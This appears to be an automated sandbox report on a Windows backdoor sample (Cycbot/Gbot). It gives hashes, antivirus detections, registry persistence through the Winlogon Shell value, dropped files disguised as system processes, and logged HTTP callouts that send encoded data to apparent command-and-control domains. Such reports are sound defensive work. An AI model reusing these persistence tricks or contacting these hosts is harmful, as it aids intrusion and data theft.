Analysis Date: 2014-12-20 01:05:39
MD5: e9936daff9939762bfcd33d33e94f269
SHA1: 01029b8f78dd2e3965716dd67167f275ee5a30d4

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: ee4244e87b9465b585627315e3cbb221 sha1: f0687822868238594a83b927ebada017e3da9bbd size: 111104
Section: .tls md5: 72aa6143776eb23503bdc5c4821c8a62 sha1: 0e98bf7490f70d26e86bce9751b699429d3b894a size: 1024
Section: .data md5: 50df714e0fb672ec2e71b375fe86f575 sha1: 968bb1740f4347d3581768b2c1ee2e7acdaabf6d size: 69632
Section: .reloc md5: a98ef833c9ef0baa5ed73f52b3c02fe2 sha1: 3c580e82233fd62c4378c8af9bea57daa569f178 size: 1024
Timestamp: 2005-11-05 19:40:20
PEhash: 889914cffb89540dc7c01962b141afbef7274244
IMPhash: 49ec966672a889ca062312d9eeffa2e9
AV: 360 Safe: Gen:Variant.Kazy.36919
AV: Ad-Aware: Gen:Variant.Kazy.36919
AV: Alwil (avast): Cybota [Trj]
AV: Arcabit (arcavir): Gen:Variant.Kazy.36919
AV: Authentium: W32/Goolbot.K.gen!Eldorado
AV: Avira (antivir): TR/Crypt.XPACK.Gen
AV: BullGuard: Gen:Variant.Kazy.36919
AV: CA (E-Trust Ino): Win32/FakeAlert.J!generic
AV: CAT (quickheal): Backdoor.Cycbot.B
AV: ClamAV: Win.Trojan.Gbot-658
AV: Dr. Web: Trojan.DownLoader4.52453
AV: Emsisoft: Gen:Variant.Kazy.36919
AV: Eset (nod32): Win32/Kryptik.SPV
AV: Fortinet: W32/Kryptik.SMY!tr.bdr
AV: Frisk (f-prot): W32/Goolbot.K.gen!Eldorado
AV: F-Secure: Gen:Variant.Kazy.36919
AV: Grisoft (avg): Win32/Cryptor
AV: Ikarus: Backdoor.Win32.Gbot
AV: K7: Backdoor ( 003210941 )
AV: Kaspersky: Backdoor.Win32.Gbot.oce
AV: MalwareBytes: Backdoor.Bot
AV: Mcafee: BackDoor-EXI.gen.n
AV: Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV: MicroWorld (escan): Gen:Variant.Kazy.36919
AV: Rising: no_virus
AV: Sophos: Mal/FakeAV-IS
AV: Symantec: Trojan.Gen
AV: Trend Micro: BKDR_CYCBOT.SME3
AV: VirusBlokAda (vba32): Trojan.FakeAV.0997

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝ explorer.exe,C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Mutex: {45BCA615-C82A-4152-8857-BCC626AE4C8D}
Creates Mutex: {5A92A751-F926-4BB9-872E-BEC4A4CD571F}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: {35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNS: 127.0.0.1
Winsock DNS: yourvideoportal.com
Winsock DNS: onlinemediaresource.com
Winsock DNS: gravatar.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Network Details:

DNS: gravatar.com
Type: A
192.0.80.241
DNS: gravatar.com
Type: A
192.0.80.242
DNS: gravatar.com
Type: A
192.0.80.239
DNS: gravatar.com
Type: A
192.0.80.240
DNS: onlinemediaresource.com
Type: A
54.208.78.194
DNS: zonedg.com
Type: A
141.8.225.80
DNS: zonedg.com
Type: A
141.8.225.80
DNS: yourvideoportal.com
Type: A
54.209.168.250
HTTP GET: http://gravatar.com/avatar.php?gravatar_id=f2a3889aff6fc9711a3cbcfe64067be1?v63=51&tq=gKZEtzypOwMiQiH2DAKYb8Nv2L8H%2F%2B6HSQmjh8dSWRAD5H3LVU2jW7%2BQ2lniYyeh0RqF1OzlfsEy10QlaMz22L7PbMnApCu0vLDkSHYKzqhZMQarbRL7DWLUvqDJ4U0nJl8oBNUpYzeeGEeFgKFYFB2H4nDlOT3iLHa5IIwqXuDrq3ibxgq3D3EQ%2Frv9zlAN9bn%2Fviz24DZnBSxVW7B%2FGe%2BXMdQ3vyWQmGqjAAmzDbm6T8QbWCSYWerFnlt8JjBTPzrLBNPKAe1LoeJV7emp7gUAXsO1KgJ%2BBIzg8u4j20LEI
User-Agent: mozilla/2.0
HTTP GET: http://onlinemediaresource.com/blog/images/3521.jpg?v39=10&tq=gKZEtzyMv5rJqxG1J42pzMffBvwr0ejbwvgS917V65rJqlLfgPiWW1cg
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJsX%2BSNxVKv975Xlm5G
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJuX%2BSNxFKv975Xlm5G
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxlKv975Xlm5G
User-Agent: mozilla/2.0
HTTP GET: http://yourvideoportal.com/blog/images/3521.jpg?v61=48&tq=gKZEtzyMv5rJqxG1J42pzMffBvwr0ejbwvgS917X65rJqlLfgPiWW1cg
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJuX%2BSNwlKv975Xlm5G
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2F82%2BcoJtX%2BSNxr5ygm1C4lKv975Xlm5G
User-Agent: mozilla/2.0
Flows TCP: 192.168.1.1:1031 ➝ 192.0.80.241:80
Flows TCP: 192.168.1.1:1032 ➝ 54.208.78.194:80
Flows TCP: 192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1037 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1038 ➝ 54.209.168.250:80
Flows TCP: 192.168.1.1:1039 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1040 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1041 ➝ 141.8.225.80:80

Raw Pcap

Strings